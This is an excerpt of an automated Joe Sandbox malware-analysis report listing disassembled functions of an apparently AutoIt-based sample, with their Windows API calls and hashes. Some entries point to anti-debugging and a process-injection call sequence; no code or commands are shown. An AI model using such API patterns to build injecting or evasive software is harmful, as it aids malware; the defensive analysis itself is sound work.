Part of subcall function 007D3B4C: IsDebuggerPresent.KERNEL32 ref: 007D3B8C
Part of subcall function 007D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008962F8,008962E0,?,?), ref: 007D3BFD
Part of subcall function 007D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D49D2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
String ID:
API String ID: 2688871447-0
Opcode ID: 4f334f9397b8276f55ba6c0f4e3daf44fe2b953235007fe0d7fc31b439ba8419
Instruction ID: eca2b68689f5b38ed15f50a8863e63950957448c1e4a1087043c2b8c75c97d1c
Opcode Fuzzy Hash: 4f334f9397b8276f55ba6c0f4e3daf44fe2b953235007fe0d7fc31b439ba8419
Instruction Fuzzy Hash: DE11A9719183119FC700EF69EC0990ABBF8FB88710F04851FF141833A2EB74A654CB96

Function 007D5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,007D5981,?,?,?,?), ref: 007D5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,007D5981,?,?,?,?), ref: 0080E19C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 545c196a0ff0bd05d397bdf23e2ea072350d90d3fd20644ff68da11dcdc87cf4
Instruction ID: 56a8dbff7095666741b69ae483c6465079e382f68b421cfa9c8ad3295720aefa
Opcode Fuzzy Hash: 545c196a0ff0bd05d397bdf23e2ea072350d90d3fd20644ff68da11dcdc87cf4
Instruction Fuzzy Hash: 7101B970244708BFF3251E14CC8AF6637ACFB01769F108319BAE59E2D0C6B81D458B50

Function 007F582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F585C
__lock_file.LIBCMT ref: 007F587D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5e05f467d7ab91d12ce5e56b9fbd13f383d9aefe20d169e7d0832fd242a4802a
Instruction ID: e07497cdf199fd391dfea6dafd0418476ea04f3c35a938434b21cfeaa1e463b2
Opcode Fuzzy Hash: 5e05f467d7ab91d12ce5e56b9fbd13f383d9aefe20d169e7d0832fd242a4802a
Instruction Fuzzy Hash: 1D018471800A0CEBCF12AF69DC099BE7B61BF803A0F144215BB245B3A1DB398A51DB91

Function 007F55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

__lock_file.LIBCMT ref: 007F561B

Part of subcall function 007F6E4E: __lock.LIBCMT ref: 007F6E71

__fclose_nolock.LIBCMT ref: 007F5626

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b81e6d42c1ab737c8e60bc66c9a0cfc0e07ae74b25fa537ad8aa56e3bb59666f
Instruction ID: c78ebf75913bd069448506335cb9222a584878aec83389e299278aa49f5df018
Opcode Fuzzy Hash: b81e6d42c1ab737c8e60bc66c9a0cfc0e07ae74b25fa537ad8aa56e3bb59666f
Instruction Fuzzy Hash: 0DF09071904A0CDADB60AF75C80A77E66A16F40B34F558209A734EB3C1CF7C89019B56

Function 007D81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,007D558F,?,?,?,?,?), ref: 007D81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,007D558F,?,?,?,?,?), ref: 007D820D

Part of subcall function 007D78AD: _memmove.LIBCMT ref: 007D78E9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 384a53c5be7f147a7a3bbef386f967cbfbcce3945f31e3bd63d4b66dcf9e1f86
Instruction ID: 9c506328f674eae954a5df127c4311a683c99ced7c7468a57a5ec0ec5b513b72
Opcode Fuzzy Hash: 384a53c5be7f147a7a3bbef386f967cbfbcce3945f31e3bd63d4b66dcf9e1f86
Instruction Fuzzy Hash: 7E01AD31241604BFEB256A25DD4AF7B3B6CEB89760F10802AFE05CD291EE24A800D671

Function 014F129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014F1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014F1B13

Memory Dump Source

Source File: 00000001.00000002.1345357015.00000000014F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14f0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: ddacf063b0970154e5b390134f0dd180d463fa035c45f87b238a3ce5ca40205c
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: D612DD24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A

Function 007E2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19d5894cfd2d7a5c666adb63d5e75df98d5acaaf7efd75b10db67ccf86cf7a9
Instruction ID: a6061bd926e6f0f58ddb258d394708ae0e77a915f8f65e31d475a968a239ed39
Opcode Fuzzy Hash: d19d5894cfd2d7a5c666adb63d5e75df98d5acaaf7efd75b10db67ccf86cf7a9
Instruction Fuzzy Hash: EB518F34600614EFCF14EB68C995EAD77B9AF88310F148169F946AB382DA38ED018751

Function 007D766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D774A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d9486a951bdec2974e78aa4f3f99f88a47f3e07a011a98a7708286be3d09a55e
Instruction ID: 232dec467aad22a427a2db7045535cd899f92dfe323ab39fc1e4da6930516942
Opcode Fuzzy Hash: d9486a951bdec2974e78aa4f3f99f88a47f3e07a011a98a7708286be3d09a55e
Instruction Fuzzy Hash: 23319479608A02DFC7289F18C494921F7F4FF08320B54C56AE99A8B7A5FB34D891CB94

Function 007D5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 007D5CF6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0004df48a320e4f2157235f82f14c62b4323338a81cc991082949e4777d617da
Instruction ID: 1d3dd53e92f3f6fdac5054aceaf2c6302b4049c1edf747f4691c4185908fff6e
Opcode Fuzzy Hash: 0004df48a320e4f2157235f82f14c62b4323338a81cc991082949e4777d617da
Instruction Fuzzy Hash: C5314C71A10B0AEFCB18DF2DC484A6DB7B6FF48310F14862AE81993714D775B960DBA0

Function 008100D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 008100E1

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: b0ebf9ed5bdb81830feaf13f3c8f374f46469b1dff85d49bc59be4c19cf25dc5
Instruction ID: 878e4485fbaa8ff396ef47d539c0502c8f87d1d92e7a307898669d0567d27fee
Opcode Fuzzy Hash: b0ebf9ed5bdb81830feaf13f3c8f374f46469b1dff85d49bc59be4c19cf25dc5
Instruction Fuzzy Hash: E841F574604341DFDB24DF14C484B1ABBF1BF45318F1989ADE9898B362C77AE885CB52

Function 007D4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 007D4D4D

Part of subcall function 007F548B: __wfsopen.LIBCMT ref: 007F5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4F6F

Part of subcall function 007D4CC8: FreeLibrary.KERNEL32(00000000), ref: 007D4D02

Part of subcall function 007D4DD0: _memmove.LIBCMT ref: 007D4E1A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 92922bbad7b72b21679efa8d720dc78ebcaf2f363aaeb392df0308c669c28c62
Instruction ID: 30d7aa5acd1e7a2034e6fb4e45335311030ce03d6fdaf0b909a1c5eb83fe1198
Opcode Fuzzy Hash: 92922bbad7b72b21679efa8d720dc78ebcaf2f363aaeb392df0308c669c28c62
Instruction Fuzzy Hash: 0311E732700709EBCF20BF70CC0AB6E77B5AF40711F10842AF941E63C2DA799A0597A1

Function 008101AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 008101BB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 35a9edd0e039e726fd22e5912f273755f0840575959835abdbd29a8dad021f69
Instruction ID: 3798e54f02098c7f8790059e27d18840e0a20ecaf82e048d629e3229ba3f1ade
Opcode Fuzzy Hash: 35a9edd0e039e726fd22e5912f273755f0840575959835abdbd29a8dad021f69
Instruction Fuzzy Hash: F8211574608341DFCB14DF54C445A1ABBF0BF88304F058969E98997721D739E845CB53

Function 007D5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,007D5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 007D5D76

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 77b8cee04012e69c6c1583f10789914b2d684907c6f9c621da3a962fd203831e
Instruction ID: ad7a6eaec78a5d99c96f1ab01a8ffb457d3985a07de67f440c96fb4716e27dbb
Opcode Fuzzy Hash: 77b8cee04012e69c6c1583f10789914b2d684907c6f9c621da3a962fd203831e
Instruction Fuzzy Hash: F3112531200B059FE3208F15C888B62B7FAEB45760F10892EE5AA86A50D7B8E945CF60

Function 007D7F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D7F82

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction ID: 9346d94976fc5e8cee12b04823e484c6b03d9fb15a0369409d9bbe70654e667f
Opcode Fuzzy Hash: c56c3b4cee92743fd843ba2fcf40f434112ab0d27706c117a31bb8eb393c03f0
Instruction Fuzzy Hash: 4301D672204705AED7345B28CC06F77BBA8EB44760F10862AF65ACA3D1EA35E401C790

Function 007F4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 007F4AD6

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 8fb53556ad7589767662f4373fb6703ecee1a0096e3b0d2af970dee2bcffb759
Instruction ID: a8181d89837fb7d4912d30648251a46d8e4a06fafac6e273e5ba908af838d126
Opcode Fuzzy Hash: 8fb53556ad7589767662f4373fb6703ecee1a0096e3b0d2af970dee2bcffb759
Instruction Fuzzy Hash: 03F0A471A4020DDBDFA1AF748C0A7BF36A5AF00325F048514B6249A3D1DB7CC951DF51

Function 007D4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4FDE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 683d5209196d4ffee11550cb8527a1cab6470a87a3e54bedc5601b1921b00830
Instruction ID: c62f12d98264a46ac80639e559885e6b16a607fcdd69e8e6b5b4b4d6614e2bec
Opcode Fuzzy Hash: 683d5209196d4ffee11550cb8527a1cab6470a87a3e54bedc5601b1921b00830
Instruction Fuzzy Hash: 99F03971505B12CFCB349F64E494822BBF2BF043293288A3FE2D682720C739A850DF40

Function 007F09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F09F4

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: da8ea14785bb055ddcf220a653fd47cbf9ffc09d07c85e1adab49dc86c9e7507
Instruction ID: da6618e23485ed8e284442b00a4abd4e6da39728ac761e628bc971c05dfed685
Opcode Fuzzy Hash: da8ea14785bb055ddcf220a653fd47cbf9ffc09d07c85e1adab49dc86c9e7507
Instruction Fuzzy Hash: B5E0CD76A0522857C720E65C9C09FFA77EDEF887A1F0401B6FD0CD7345EA649C818691

Function 00839129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0083914B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
